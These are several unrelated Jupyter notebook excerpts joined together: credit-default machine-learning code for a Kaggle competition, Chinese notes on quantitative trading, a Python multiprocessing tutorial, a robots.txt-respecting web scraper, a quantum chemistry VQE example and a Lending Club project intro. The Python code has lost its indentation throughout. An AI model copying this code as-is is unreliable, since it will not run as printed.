df['PAYMENT_MIN_TO_ANNUITY_RATIO'] = df['INS_AMT_PAYMENT_MIN'] / df['AMT_ANNUITY']
df['PAYMENT_MAX_TO_ANNUITY_RATIO'] = df['INS_AMT_PAYMENT_MAX'] / df['AMT_ANNUITY']
df['PAYMENT_MEAN_TO_ANNUITY_RATIO'] = df['INS_AMT_PAYMENT_MEAN'] / df['AMT_ANNUITY']
df['CTA_CREDIT_TO_ANNUITY_MAX_RATIO'] = df['APPROVED_CREDIT_TO_ANNUITY_RATIO_MAX'] / df[
'CREDIT_TO_ANNUITY_RATIO']
df['CTA_CREDIT_TO_ANNUITY_MEAN_RATIO'] = df['APPROVED_CREDIT_TO_ANNUITY_RATIO_MEAN'] / df[
'CREDIT_TO_ANNUITY_RATIO']
df['DAYS_DECISION_MEAN_TO_BIRTH'] = df['APPROVED_DAYS_DECISION_MEAN'] / df['DAYS_BIRTH']
df['DAYS_CREDIT_MEAN_TO_BIRTH'] = df['BUREAU_DAYS_CREDIT_MEAN'] / df['DAYS_BIRTH']
df['DAYS_DECISION_MEAN_TO_EMPLOYED'] = df['APPROVED_DAYS_DECISION_MEAN'] / df['DAYS_EMPLOYED']
df['DAYS_CREDIT_MEAN_TO_EMPLOYED'] = df['BUREAU_DAYS_CREDIT_MEAN'] / df['DAYS_EMPLOYED']
return df
df = add_ratios_features(df)
df.replace([np.inf, -np.inf], np.nan, inplace=True)
train = df[df['TARGET'].notnull()]
test = df[df['TARGET'].isnull()]
del df
gc.collect()
labels = train['TARGET']
train = train.drop(columns=['TARGET'])
test = test.drop(columns=['TARGET'])
feature = list(train.columns)
test_df = test.copy()
train_df = train.copy()
train_df['TARGET'] = labels
imputer = SimpleImputer(strategy = 'median')
imputer.fit(train)
train = imputer.transform(train)
test = imputer.transform(test)
scaler = MinMaxScaler(feature_range = (0, 1))
scaler.fit(train)
train = scaler.transform(train)
test = scaler.transform(test)
log_reg = LogisticRegression(C = 0.0001)
log_reg.fit(train, labels)
log_reg_pred = log_reg.predict_proba(test)[:, 1]
submit = test_df[['SK_ID_CURR']]
submit['TARGET'] = log_reg_pred
submit.to_csv('log_reg.csv', index = False)
random_forest = RandomForestClassifier(n_estimators = 100, random_state = 50, verbose = 1, n_jobs = -1)
random_forest.fit(train, labels)
predictions = random_forest.predict_proba(test)[:, 1]
del train, test
gc.collect()
submit = test_df[['SK_ID_CURR']]
submit['TARGET'] = predictions
del predictions
submit.to_csv('random_forest.csv', index = False)
del submit
gc.collect()
# Ref: https://pranaysite.netlify.app/lightgbm/
def model(features, test_features, encoding = 'ohe', n_folds = 5):
"""Train and test a light gradient boosting model using
cross validation.
Parameters
--------
features (pd.DataFrame):
dataframe of training features to use
for training a model. Must include the TARGET column.
test_features (pd.DataFrame):
dataframe of testing features to use
for making predictions with the model.
encoding (str, default = 'ohe'):
method for encoding categorical variables. Either 'ohe' for one-hot encoding or 'le' for integer label encoding
n_folds (int, default = 5): number of folds to use for cross validation
Return
--------
submission (pd.DataFrame):
dataframe with `SK_ID_CURR` and `TARGET` probabilities
predicted by the model.
feature_importances (pd.DataFrame):
dataframe with the feature importances from the model.
valid_metrics (pd.DataFrame):
dataframe with training and validation metrics (ROC AUC) for each fold and overall.
"""
# Extract the ids
train_ids = features['SK_ID_CURR']
test_ids = test_features['SK_ID_CURR']
# Extract the labels for training
labels = features['TARGET']
# Remove the ids and target
features = features.drop(columns = ['SK_ID_CURR', 'TARGET'])
test_features = test_features.drop(columns = ['SK_ID_CURR'])
# One Hot Encoding
if encoding == 'ohe':
features = pd.get_dummies(features)
test_features = pd.get_dummies(test_features)
# Align the dataframes by the columns
features, test_features = features.align(test_features, join = 'inner', axis = 1)
# No categorical indices to record
cat_indices = 'auto'
# Integer label encoding
elif encoding == 'le':
# Create a label encoder
label_encoder = LabelEncoder()
# List for storing categorical indices
cat_indices = []
# Iterate through each column
for i, col in enumerate(features):
if features[col].dtype == 'object':
# Map the categorical features to integers
features[col] = label_encoder.fit_transform(np.array(features[col].astype(str)).reshape((-1,)))
test_features[col] = label_encoder.transform(np.array(test_features[col].astype(str)).reshape((-1,)))
# Record the categorical indices
cat_indices.append(i)
# Catch error if label encoding scheme is not valid
else:
raise ValueError("Encoding must be either 'ohe' or 'le'")
print('Training Data Shape: ', features.shape)
print('Testing Data Shape: ', test_features.shape)
# Extract feature names
feature_names = list(features.columns)
# Convert to np arrays
features = np.array(features)
test_features = np.array(test_features)
# Create the kfold object
k_fold = KFold(n_splits = n_folds, shuffle = True, random_state = 50)
# Empty array for feature importances
feature_importance_values = np.zeros(len(feature_names))
# Empty array for test predictions
test_predictions = np.zeros(test_features.shape[0])
# Empty array for out of fold validation predictions
out_of_fold = np.zeros(features.shape[0])
# Lists for recording validation and training scores
valid_scores = []
train_scores = []
# Iterate through each fold
for train_indices, valid_indices in k_fold.split(features):
# Training data for the fold
train_features, train_labels = features[train_indices], labels[train_indices]
# Validation data for the fold
valid_features, valid_labels = features[valid_indices], labels[valid_indices]
# Create the model
model = lgb.LGBMClassifier(n_estimators=10000, objective = 'binary',
class_weight = 'balanced', learning_rate = 0.05,
reg_alpha = 0.1, reg_lambda = 0.1,
subsample = 0.8, n_jobs = -1, random_state = 50)
# Train the model
model.fit(train_features, train_labels, eval_metric = 'auc',
eval_set = [(valid_features, valid_labels), (train_features, train_labels)],
eval_names = ['valid', 'train'], categorical_feature = cat_indices,
early_stopping_rounds = 100, verbose = 200)
# Record the best iteration
best_iteration = model.best_iteration_
# Record the feature importances
feature_importance_values += model.feature_importances_ / k_fold.n_splits
# Make predictions
test_predictions += model.predict_proba(test_features, num_iteration = best_iteration)[:, 1] / k_fold.n_splits
# Record the out of fold predictions
out_of_fold[valid_indices] = model.predict_proba(valid_features, num_iteration = best_iteration)[:, 1]
# Record the best score
valid_score = model.best_score_['valid']['auc']
train_score = model.best_score_['train']['auc']
valid_scores.append(valid_score)
train_scores.append(train_score)
# Clean up memory
gc.enable()
del model, train_features, valid_features
gc.collect()
# Make the submission dataframe
submission = pd.DataFrame({'SK_ID_CURR': test_ids, 'TARGET': test_predictions})
# Make the feature importance dataframe
feature_importances = pd.DataFrame({'feature': feature_names, 'importance': feature_importance_values})
# Overall validation score
valid_auc = roc_auc_score(labels, out_of_fold)
# Add the overall scores to the metrics
valid_scores.append(valid_auc)
train_scores.append(np.mean(train_scores))
# Needed for creating dataframe of validation scores
fold_names = list(range(n_folds))
fold_names.append('overall')
# Dataframe of validation scores
metrics = pd.DataFrame({'fold': fold_names,
'train': train_scores,
'valid': valid_scores})
return submission, feature_importances, metrics
submission, fi, metrics = model(train_df, test_df, n_folds=5)
print('LightGBM metrics')
print(metrics)
def plot_feature_importances(df):
"""
Plot importances returned by a model. This can work with any measure of
feature importance provided that higher importance is better.
Args:
df (dataframe): feature importances. Must have the features in a column
called `features` and the importances in a column called `importance
Returns:
shows a plot of the 15 most importance features
df (dataframe): feature importances sorted by importance (highest to lowest)
with a column for normalized importance
"""
# Sort features according to importance
df = df.sort_values('importance', ascending = False).reset_index()
# Normalize the feature importances to add up to one
df['importance_normalized'] = df['importance'] / df['importance'].sum()
# Make a horizontal bar chart of feature importances
plt.figure(figsize = (10, 6))
ax = plt.subplot()
# Need to reverse the index to plot most important on top
ax.barh(list(reversed(list(df.index[:15]))),
df['importance_normalized'].head(15),
align = 'center', edgecolor = 'k')
# Set the yticks and labels
ax.set_yticks(list(reversed(list(df.index[:15]))))
ax.set_yticklabels(df['feature'].head(15))
# Plot labeling
plt.xlabel('Normalized Importance'); plt.title('Feature Importances')
plt.show()
return df
fi_sorted = plot_feature_importances(fi)
submission.to_csv('lgb.csv', index = False)
del submission, fi, fi_sorted, metrics
gc.collect()
train_values = labels
train_id = train_df['SK_ID_CURR']
test_id = test_df['SK_ID_CURR']
train_df_xg = train_df.copy()
test_df_xg = test_df.copy()
train_df_xg.drop('SK_ID_CURR', inplace=True, axis=1)
test_df_xg.drop('SK_ID_CURR', inplace=True, axis=1)
train_df_xg, test_df_xg = train_df_xg.align(test_df_xg, join = 'inner', axis = 1)
ratio = (train_values == 0).sum()/ (train_values == 1).sum()
del train_df, test_df
gc.collect()
X_train, X_test, y_train, y_test = train_test_split(train_df_xg, train_values, test_size=0.2, stratify=train_values, random_state=1)
clf = XGBClassifier(n_estimators=1200, objective='binary:logistic', gamma=0.098, subsample=0.5, scale_pos_weight=ratio )
clf.fit(X_train, y_train, eval_set=[(X_test, y_test)], eval_metric='auc', early_stopping_rounds=10)
predictions = clf.predict_proba(test_df_xg.values)[:, 1]
submission = pd.DataFrame({'SK_ID_CURR': test_id.values, 'TARGET': predictions})
submission.to_csv('xgboost.csv', index = False)
!kaggle competitions submit home-credit-default-risk -f lgb.csv -m "Notebook Home Credit Loan | v6 | LightGBM"
#!kaggle competitions submit home-credit-default-risk -f xgboost.csv -m "Notebook Home Credit Loan | v5 | XGBoost"
#!kaggle competitions submit home-credit-default-risk -f log_reg.csv -m "Notebook Home Credit Loan | v5 | LogisticRegression"
#!kaggle competitions submit home-credit-default-risk -f random_forest.csv -m "Notebook Home Credit Loan | v5 | RandomForest"
```
|
github_jupyter
|
- 广发证券之《深度学习之股指期货日内交易策略》
- 《宽客人生》
- 《主动投资组合管理》
-
-------------------------------------------------------
量化研报只是应付客户而做的产物,对于实际交易用处不大
策略对于市场的参数时刻都在变化
策略+相应的参数调整才是完整的
策略本身也需要非常强的主观调整 ----------周杰
拿到一个静态的策略并不是一个万能钥匙,对于细节处没多大用处,挣钱完全是靠细节
世界不存在一种一成不变的交易体系能让你永远的挣钱
-------------------------------------------------------
**量化体系:**
定价体系:BSM期权定价,基于基本面的股票定价......
因子体系:来源与CAPM理论,通过将信号元做线性回归来提供信息量
产品体系:最常见的FOF,MOM
套利体系:通过协整的手段形成的一系列的策略
固收体系:基于收益率衍生概念对货币、外汇、债券市场的交易
高频体系:基于市场微观结构的验证
深度学习不是一个单独的策略系统,而是一种研究方法
----------------------------------------------------------------------
--->理论先行
--->拒绝信息素元
--->连续 & 收敛
--->市场不完全
--->预测性与表征性
--->策略的证伪方式
--->策略陷阱
* 量化交易不是计算机视角下的数字结果,而事实是,量化交易扎根于理论之中
* 信息的发掘和使用构成了交易整体的具体思路
* 信息素元是指市场无法再被细分的信息元
* 信息元连续且收敛,挖掘因子时,连续指在一段时间内因子连续有效或连续无效,连续的过程可能不是线性的
* 收敛是指单方向放大或缩小因子,必须在某个地方达到极值,不要求是单调的,但必须达到极值,调大一点,效果好一点,再调大一点,效果再好一点,当跳到某个值的时候,没效果了,即出现极值收敛了,不能出现因子无限大,收益无限大的情况,这种因子一定是错的
* 所有的有效的信息元全部都是连续且收敛的
* 市场不完全
* 真正有效的因子是机密,一定不要是市场都知道的东西,一个很有趣的例子:运用当天的第一根K线预测当天的涨跌幅(这个因子肯定无效)
* 天气一热,大街上的小姑凉穿裙子比较多,但不能通过大街上穿裙子的姑凉人数来预测明天的温度,温度与穿裙子女生的人数只有表征性,严格的区分这一点
* 函数的单调性:函数的单调性(monotonicity)也可以叫做函数的增减性。当函数 f(x) 的自变量在其定义区间内增大(或减小)时,函数值f(x)也随着增大(或减小),则称该函数为在该区间上具有单调性。
* 函数的连续性:连续函数是指函数y=f(x)当自变量x的变化很小时,所引起的因变量y的变化也很小。因变量关于自变量是连续变化的,连续函数在直角坐标系中的图像是一条没有断裂的连续曲线。
-----------------------------------------------------------------------------------------
**量化交易的研究方法论**
一切接套路
方法论意味着你的工作步骤与要求,可以理解为一个操作手册,在任一体系下每时每刻应该干什么
清楚了方法论,就知道每天每时每刻该干什么,但是市场上没有任何一本书,任何一门课程讲量化研究方法论的,都是每个人总结的
在研究的过程中,一定要把方法论放在前面,会让你少走很多弯路
----------------------------------------------------------------------------------------------------------------------------------------------------------
**套利**
内因套利
* 期限套
* 跨期套
* 跨市场套
* 产业链套
关联套
* 跨品种套
* 衍生品套
1.计算cu 和 ni的历史价格线性关系
2.给定一个显著性水平,通常选取**α**=5%
3.假设其残差服从正态分布,并计算置信区间
4.置信区间上下限作为交易开仓的阈值
5.突破置信区间上限开仓做空,突破下限开仓做多
均值回归
极值捕捉
---------------------------------------------------------------------
做量化的人没有止盈,没有止损
策略必须是一个严格的闭环,当前的亏损有没有超出模型的空间
止盈止损是主观交易法,在量化层面止盈止损是个伪命题
做的交易要在下单之前明确赢的可能性有多大,亏损的可能性有多大,整体的期望有多大
涨跌的概率之前要算清楚了才叫量化,这个可以是概率,可以是分布
--------------------------------------------
**数学方面的学习:**
* 随机过程分析
* 时间序列
* AI
形成自己的哲学基石
-------------------------------------------------------------
**黑白天鹅**
能够观察到的风险都是白天鹅
原油负价格从未出现之前它是黑天鹅,出现之后就不是了
明天外星人入侵地球,这是黑天鹅
黑天鹅应该在风控的层面考虑,而不是在策略层面考虑
-------------------------------------------------------------
|
github_jupyter
|
## Passing Messages to Processes
As with threads, a common use pattern for multiple processes is to divide a job up among several workers to run in parallel. Effective use of multiple processes usually requires some communication between them, so that work can be divided and results can be aggregated. A simple way to communicate between processes with multiprocessing is to use a Queue to pass messages back and forth. **Any object that can be serialized with pickle can pass through a Queue.**
```
import multiprocessing
class MyFancyClass:
def __init__(self, name):
self.name = name
def do_something(self):
proc_name = multiprocessing.current_process().name
print('Doing something fancy in {} for {}!'.format(
proc_name, self.name))
def worker(q):
obj = q.get()
obj.do_something()
if __name__ == '__main__':
queue = multiprocessing.Queue()
p = multiprocessing.Process(target=worker, args=(queue,))
p.start()
queue.put(MyFancyClass('Fancy Dan'))
# Wait for the worker to finish
queue.close()
queue.join_thread()
p.join()
```
A more complex example shows how to manage several workers consuming data from a JoinableQueue and passing results back to the parent process. The poison pill technique is used to stop the workers. After setting up the real tasks, the main program adds one “stop” value per worker to the job queue. When a worker encounters the special value, it breaks out of its processing loop. The main process uses the task queue’s join() method to wait for all of the tasks to finish before processing the results.
```
import multiprocessing
import time
class Consumer(multiprocessing.Process):
def __init__(self, task_queue, result_queue):
multiprocessing.Process.__init__(self)
self.task_queue = task_queue
self.result_queue = result_queue
def run(self):
proc_name = self.name
while True:
next_task = self.task_queue.get()
if next_task is None:
# Poison pill means shutdown
print('{}: Exiting'.format(proc_name))
self.task_queue.task_done()
break
print('{}: {}'.format(proc_name, next_task))
answer = next_task()
self.task_queue.task_done()
self.result_queue.put(answer)
class Task:
def __init__(self, a, b):
self.a = a
self.b = b
def __call__(self):
time.sleep(0.1) # pretend to take time to do the work
return '{self.a} * {self.b} = {product}'.format(
self=self, product=self.a * self.b)
def __str__(self):
return '{self.a} * {self.b}'.format(self=self)
if __name__ == '__main__':
# Establish communication queues
tasks = multiprocessing.JoinableQueue()
results = multiprocessing.Queue()
# Start consumers
num_consumers = multiprocessing.cpu_count() * 2
print('Creating {} consumers'.format(num_consumers))
consumers = [
Consumer(tasks, results)
for i in range(num_consumers)
]
for w in consumers:
w.start()
# Enqueue jobs
num_jobs = 10
for i in range(num_jobs):
tasks.put(Task(i, i))
# Add a poison pill for each consumer
for i in range(num_consumers):
tasks.put(None)
# Wait for all of the tasks to finish
tasks.join()
# Start printing results
while num_jobs:
result = results.get()
print('Result:', result)
num_jobs -= 1
```
## Signaling between Processes
The Event class provides a simple way to communicate state information between processes. An event can be toggled between set and unset states. Users of the event object can wait for it to change from unset to set, using an optional timeout value.
```
import multiprocessing
import time
def wait_for_event(e):
"""Wait for the event to be set before doing anything"""
print('wait_for_event: starting')
e.wait()
print('wait_for_event: e.is_set()->', e.is_set())
def wait_for_event_timeout(e, t):
"""Wait t seconds and then timeout"""
print('wait_for_event_timeout: starting')
e.wait(t)
print('wait_for_event_timeout: e.is_set()->', e.is_set())
if __name__ == '__main__':
e = multiprocessing.Event()
w1 = multiprocessing.Process(
name='block',
target=wait_for_event,
args=(e,),
)
w1.start()
w1 = multiprocessing.Process(
name='block',
target=wait_for_event,
args=(e,),
)
w1.start()
w2 = multiprocessing.Process(
name='nonblock',
target=wait_for_event_timeout,
args=(e, 2),
)
w2.start()
print('main: waiting before calling Event.set()')
time.sleep(3)
e.set()
print('main: event is set')
```
* When wait() times out it returns without an error. The caller is responsible for checking the state of the event using is_set().
* a event.set() will set off all process that are waiting for this event
## Controlling Access to Resources
In situations when a single resource needs to be shared between multiple processes, a Lock can be used to avoid conflicting accesses.
```
import multiprocessing
import sys
def worker_with(lock, stream):
with lock:
stream.write('Lock acquired via with\n')
def worker_no_with(lock, stream):
lock.acquire()
try:
stream.write('Lock acquired directly\n')
finally:
lock.release()
lock = multiprocessing.Lock()
w = multiprocessing.Process(
target=worker_with,
args=(lock, sys.stdout),
)
nw = multiprocessing.Process(
target=worker_no_with,
args=(lock, sys.stdout),
)
w.start()
nw.start()
w.join()
nw.join()
```
## Synchronizing Operations
### Condition
Condition objects can be used to synchronize parts of a workflow so that some run in parallel but others run sequentially, even if they are in separate processes.
```
import multiprocessing
import time
def stage_1(cond):
"""perform first stage of work,
then notify stage_2 to continue
"""
name = multiprocessing.current_process().name
print('Starting', name)
with cond:
print('{} done and ready for stage 2'.format(name))
cond.notify_all()
def stage_2(cond):
"""wait for the condition telling us stage_1 is done"""
name = multiprocessing.current_process().name
print('Starting', name)
with cond:
cond.wait()
print('{} running'.format(name))
if __name__ == '__main__':
condition = multiprocessing.Condition()
s1 = multiprocessing.Process(name='s1',
target=stage_1,
args=(condition,))
s2_clients = [
multiprocessing.Process(
name='stage_2[{}]'.format(i),
target=stage_2,
args=(condition,),
)
for i in range(1, 3)
]
for c in s2_clients:
c.start()
time.sleep(1)
s1.start()
s1.join()
for c in s2_clients:
c.join()
```
In this example, two process run the second stage of a job in parallel, but only after the first stage is done.
## Controlling Concurrent Access to Resources
Sometimes it is useful to allow more than one worker access to a resource at a time, while still limiting the overall number. For example, a connection pool might support a fixed number of simultaneous connections, or a network application might support a fixed number of concurrent downloads. A Semaphore is one way to manage those connections.
```
import random
import multiprocessing
import time
class ActivePool:
def __init__(self):
super(ActivePool, self).__init__()
self.mgr = multiprocessing.Manager()
self.active = self.mgr.list()
self.lock = multiprocessing.Lock()
def makeActive(self, name):
with self.lock:
self.active.append(name)
def makeInactive(self, name):
with self.lock:
self.active.remove(name)
def __str__(self):
with self.lock:
return str(self.active)
def worker(s, pool):
name = multiprocessing.current_process().name
with s:
pool.makeActive(name)
print('Activating {} now running {}'.format(
name, pool))
time.sleep(random.random())
pool.makeInactive(name)
if __name__ == '__main__':
pool = ActivePool()
s = multiprocessing.Semaphore(3)
jobs = [
multiprocessing.Process(
target=worker,
name=str(i),
args=(s, pool),
)
for i in range(10)
]
for j in jobs:
j.start()
while True:
alive = 0
for j in jobs:
if j.is_alive():
alive += 1
j.join(timeout=0.1)
print('Now running {}'.format(pool))
if alive == 0:
# all done
break
```
## Managing Shared State
In the previous example, the list of active processes is maintained centrally in the ActivePool instance via a special type of list object created by a Manager. The Manager is responsible for coordinating shared information state between all of its users.
```
import multiprocessing
import pprint
def worker(d, key, value):
d[key] = value
if __name__ == '__main__':
mgr = multiprocessing.Manager()
d = mgr.dict()
jobs = [
multiprocessing.Process(
target=worker,
args=(d, i, i * 2),
)
for i in range(10)
]
for j in jobs:
j.start()
for j in jobs:
j.join()
print('Results:', d)
```
By creating the list through the manager, it is shared and updates are seen in all processes. Dictionaries are also supported.
## Shared Namespaces
In addition to dictionaries and lists, a Manager can create a shared Namespace.
```
import multiprocessing
def producer(ns, event):
ns.value = 'This is the value'
event.set()
def consumer(ns, event):
try:
print('Before event: {}'.format(ns.value))
except Exception as err:
print('Before event, error:', str(err))
event.wait()
print('After event:', ns.value)
if __name__ == '__main__':
mgr = multiprocessing.Manager()
namespace = mgr.Namespace()
event = multiprocessing.Event()
p = multiprocessing.Process(
target=producer,
args=(namespace, event),
)
c = multiprocessing.Process(
target=consumer,
args=(namespace, event),
)
c.start()
p.start()
c.join()
p.join()
```
Any named value added to the Namespace is visible to all of the clients that receive the Namespace instance.
**It is important to know that updates to the contents of mutable values in the namespace are not propagated automatically.**
```
import multiprocessing
def producer(ns, event):
# DOES NOT UPDATE GLOBAL VALUE!
ns.my_list.append('This is the value')
event.set()
def consumer(ns, event):
print('Before event:', ns.my_list)
event.wait()
print('After event :', ns.my_list)
if __name__ == '__main__':
mgr = multiprocessing.Manager()
namespace = mgr.Namespace()
namespace.my_list = []
event = multiprocessing.Event()
p = multiprocessing.Process(
target=producer,
args=(namespace, event),
)
c = multiprocessing.Process(
target=consumer,
args=(namespace, event),
)
c.start()
p.start()
c.join()
p.join()
```
## Process Pools
The Pool class can be used to manage a fixed number of workers for simple cases where the work to be done can be broken up and distributed between workers independently. The return values from the jobs are collected and returned as a list. The pool arguments include the number of processes and a function to run when starting the task process (invoked once per child).
```
import multiprocessing
def do_calculation(data):
return data * 2
def start_process():
print('Starting', multiprocessing.current_process().name)
if __name__ == '__main__':
inputs = list(range(10))
print('Input :', inputs)
builtin_outputs = map(do_calculation, inputs)
print('Built-in:', [i for i in builtin_outputs])
pool_size = multiprocessing.cpu_count() * 2
pool = multiprocessing.Pool(
processes=pool_size,
initializer=start_process,
)
pool_outputs = pool.map(do_calculation, inputs)
pool.close() # no more tasks
pool.join() # wrap up current tasks
print('Pool :', pool_outputs)
```
By default, Pool creates a fixed number of worker processes and passes jobs to them until there are no more jobs. Setting the maxtasksperchild parameter tells the pool to restart a worker process after it has finished a few tasks, preventing long-running workers from consuming ever more system resources.
```
import multiprocessing
def do_calculation(data):
return data * 2
def start_process():
print('Starting', multiprocessing.current_process().name)
if __name__ == '__main__':
inputs = list(range(10))
print('Input :', inputs)
builtin_outputs = map(do_calculation, inputs)
print('Built-in:', builtin_outputs)
pool_size = multiprocessing.cpu_count() * 2
pool = multiprocessing.Pool(
processes=pool_size,
initializer=start_process,
maxtasksperchild=2,
)
pool_outputs = pool.map(do_calculation, inputs)
pool.close() # no more tasks
pool.join() # wrap up current tasks
print('Pool :', pool_outputs)
```
The pool restarts the workers when they have completed their allotted tasks, even if there is no more work. In this output, eight workers are created, even though there are only 10 tasks, and each worker can complete two of them at a time.
|
github_jupyter
|
```
import urllib.request as urlreq
import urllib.error as urlerr
import urllib.parse as urlparse
import urllib.robotparser as urlrp
from bs4 import BeautifulSoup
import re
import datetime
import time
import sys
sys.path.append('../')
from common.utils import *
url = "http://example.webscraping.com/places/default/view/Argentina-11"
html = download(url)
soup = BeautifulSoup(html, "lxml")
trs = soup.find_all(attrs={'id':re.compile('places_.*__row')})
for tr in trs:
td = tr.find(attrs={'class':'w2p_fw'})
value = td.text
print(value)
import lxml.html
tree = lxml.html.fromstring(html)
td = tree.cssselect('tr#places_area__row > td.w2p_fw')[0]
area = td.text_content()
print(area)
FIELDS = ('area', 'population', 'iso', 'country', 'capital', 'continent',
'tld', 'currency_code', 'currency_name', 'phone', 'postal_code_format',
'postal_code_regex', 'languages', 'neighbours')
def re_scraper(html):
results = {}
for field in FIELDS:
results[field] = re.search('<tr id="places_%s__row">.*?<td class="w2p_fw">(.*?)<\/td>' % field, html.decode()).groups()[0]
return results
def bs_scraper(html):
soup = BeautifulSoup(html, "lxml")
results = {}
for field in FIELDS:
results[field] = soup.find('table').find('tr', id='places_%s__row' % field).find(
'td', class_='w2p_fw').text
return results
def lxml_scraper(html):
tree = lxml.html.fromstring(html)
results = {}
for field in FIELDS:
results[field] = tree.cssselect('table > tr#places_%s__row > td.w2p_fw' %
field)[0].text_content()
return results
import time
NUM_ITERATIONS = 1000
for name, scraper in [('Regular expressions', re_scraper),
('BeautifulSoup', bs_scraper),
('Lxml', lxml_scraper)]:
start = time.time()
for i in range(NUM_ITERATIONS):
if scraper == re_scraper:
re.purge()
result = scraper(html)
assert(result['area'] == '2,766,890 square kilometres')
end = time.time()
print("%s: %.2f seconds" % (name, end-start))
def scrape_callback(url, html):
if re.search('/view/', url):
tree = lxml.html.fromstring(html)
row = [tree.cssselect('table > tr#places_{}__row > td.w2p_fw'.format(field))[0].text_content() for field in FIELDS]
print(url, row)
import csv
class ScrapeCallback:
def __init__(self):
self.writer = csv.writer(open('countries.csv', 'w'))
self.fields = ('area', 'population', 'iso', 'country', 'capital', 'continent', 'tld', 'currency_code', 'currency_name', 'phone', 'postal_code_format', 'postal_code_regex', 'languages', 'neighbours')
self.writer.writerow(self.fields)
def __call__(self, url, html):
if re.search('/view/', url):
tree = lxml.html.fromstring(html)
row = []
for field in self.fields:
row.append(tree.cssselect('table > tr#places_{}__row > td.w2p_fw'.format(field))[0].text_content())
self.writer.writerow(row)
def link_crawler(seed_url, link_regex, max_depth=2, scrape_callback=None):
crawl_queue = [seed_url]
seen = {seed_url:0}
throttle = Throttle(3)
user_agent = 'victor'
rp = urlrp.RobotFileParser()
rp.set_url("http://example.webscraping.com/robots.txt")
rp.read()
while crawl_queue:
url = crawl_queue.pop()
depth = seen[url]
if rp.can_fetch(user_agent, url):
throttle.wait(url)
html = download(url, user_agent)
if scrape_callback:
scrape_callback(url, html)
if depth != max_depth:
for link in get_links(html.decode()):
# skip all login pages
if re.search('login|register', link):
continue
if re.search(link_regex, link):
# form absolute link
link = urlparse.urljoin(seed_url, link)
# check if this link is already seen
if link not in seen:
seen[link] = depth + 1
crawl_queue.append(link)
else:
print('blocked by robots.txt, ', url)
return seen
all_links = link_crawler('http://example.webscraping.com', '/(index|view)/', scrape_callback=scrape_callback)
all_links = link_crawler('http://example.webscraping.com', '/(index|view)/', scrape_callback=ScrapeCallback())
```
|
github_jupyter
|
# End-to-end quantum chemistry VQE using Qu & Co Chemistry
In this tutorial we show how to solve the groundstate energy of a hydrogen molecule using VQE, as a function of the spacing between the atoms of the molecule. For a more detailed discussion on MolecularData generation or VQE settings, please refer to our other tutorials. We here focus on the exact UCCSD method, which is the upper bound of a UCCSD-based VQE approach performance. In reality, errors are incurred by Trotterizing the UCC Hamiltonian evolution.
```
from openfermion.hamiltonians import MolecularData
from qucochemistry.vqe import VQEexperiment
from openfermionpyscf import run_pyscf
import numpy as np
#H2 spacing
spacing =np.array([0.1,0.15,0.2,0.25,0.3,0.4,0.5,0.6,0.7,0.74,0.75,0.8,0.85,0.9,1.0,1.1,1.2,1.3,1.4,1.5,1.6,1.7,1.8,1.9,2.0,2.2,2.4,2.6,2.8,3.0])
M=len(spacing)
# Set molecule parameters and desired basis.
basis = 'sto-3g'
multiplicity = 1
# Set calculation parameters.
run_scf = 1
run_mp2 = 1
run_cisd = 1
run_ccsd = 1
run_fci = 1
E_fci=np.zeros([M,1])
E_hf=np.zeros([M,1])
E_ccsd=np.zeros([M,1])
E_uccsd=np.zeros([M,1])
E_uccsd_opt=np.zeros([M,1])
for i, space in enumerate(spacing):
#construct molecule data storage object
geometry = [('H', (0., 0., 0.)), ('H', (0., 0., space))]
molecule = MolecularData(geometry, basis, multiplicity,description='pyscf_H2_' + str(space*100))
molecule.filename = 'molecules/H2/H2_pyscf_' + str(space)[0] +'_' +str(space)[2:] #location of the .hdf5 file to store the data in
# Run PySCF to add the data.
molecule = run_pyscf(molecule,
run_scf=run_scf,
run_mp2=run_mp2,
run_cisd=run_cisd,
run_ccsd=run_ccsd,
run_fci=run_fci)
vqe = VQEexperiment(molecule=molecule,method='linalg', strategy='UCCSD')
E_uccsd[i]=vqe.objective_function()
vqe.start_vqe()
E_uccsd_opt[i]=vqe.get_results().fun
E_fci[i]=float(molecule.fci_energy)
E_hf[i]=float(molecule.hf_energy)
E_ccsd[i]=float(molecule.ccsd_energy)
```
We compare the results for 5 different strategies: classical HF, CCSD, and FCI, with a quantum unitary variant of CCSD, called UCCSD and its optimized version. In other words, we calculate the Hamiltonian expectation value for a wavefunction which was propagated by a UCCSD ansatz with CCSD amplitudes. Then we initiate an optimization algorithm over these starting amplitudes in order to reach even closer to the true ground state and thus minimizing the energy.
In essence, with the method='linalg' option, we do not create a quantum circuit, but rather directly take the matrix exponential of the UCC-Hamiltonian. In reality, for a gate-based architecture, one would need to select a Trotterization protocol to execute this action on a QPU, incurring Trotterization errors along the way.
We plot the results below:
```
%matplotlib notebook
import matplotlib.pyplot as plt
plt.figure()
plt.plot(spacing,E_hf,label='HF energy')
plt.plot(spacing,E_ccsd,label='CCSD energy')
plt.plot(spacing,E_uccsd,label='UCCSD energy (guess)')
plt.plot(spacing,E_uccsd_opt,label='UCCSD energy (optim)')
plt.plot(spacing,E_fci,label='FCI energy')
plt.xlabel('spacing (Angstrom)')
plt.ylabel('Energy (Hartree)')
plt.title('Disassociation curve hydrogen molecule')
plt.legend()
plt.figure()
plt.semilogy(spacing,np.abs(E_fci-E_hf),label='HF energy')
plt.semilogy(spacing,np.abs(E_fci-E_ccsd),label='CCSD energy')
plt.semilogy(spacing,np.abs(E_fci-E_uccsd),label='UCCSD energy (guess)')
plt.semilogy(spacing,np.abs(E_fci-E_uccsd_opt),label='UCCSD energy (optim)')
plt.semilogy(spacing,0.0016*np.ones([len(spacing),1]),label='chemical accuracy',linestyle='-.',color='black')
plt.xlabel('spacing (Angstrom)')
plt.ylabel('Energy error with FCI (Hartree)')
plt.title('Error with FCI - Disassociation curve hydrogen molecule')
plt.legend()
```
We find that the HF energy is not within chemical accuracy with the FCI energy, while CCSD and UCCSD can reach that level. Clearly, for larger bond distances the approximations are less accurate but still the UCCSD optimization reaches numerical precision accuracy to the ground state. Note that the UCCSD method is not guaranteed to reach this level of accuracy with general molecules; one can experiment with that using this notebook before implementing the UCC in a quantum circuit, which will always perform worse.
|
github_jupyter
|
# Random Forest Project
For this project we will be exploring publicly available data from [LendingClub.com](www.lendingclub.com). Lending Club connects people who need money (borrowers) with people who have money (investors). Hopefully, as an investor you would want to invest in people who showed a profile of having a high probability of paying you back. We will try to create a model that will help predict this.
Lending club had a [very interesting year in 2016](https://en.wikipedia.org/wiki/Lending_Club#2016), so let's check out some of their data and keep the context in mind. This data is from before they even went public.
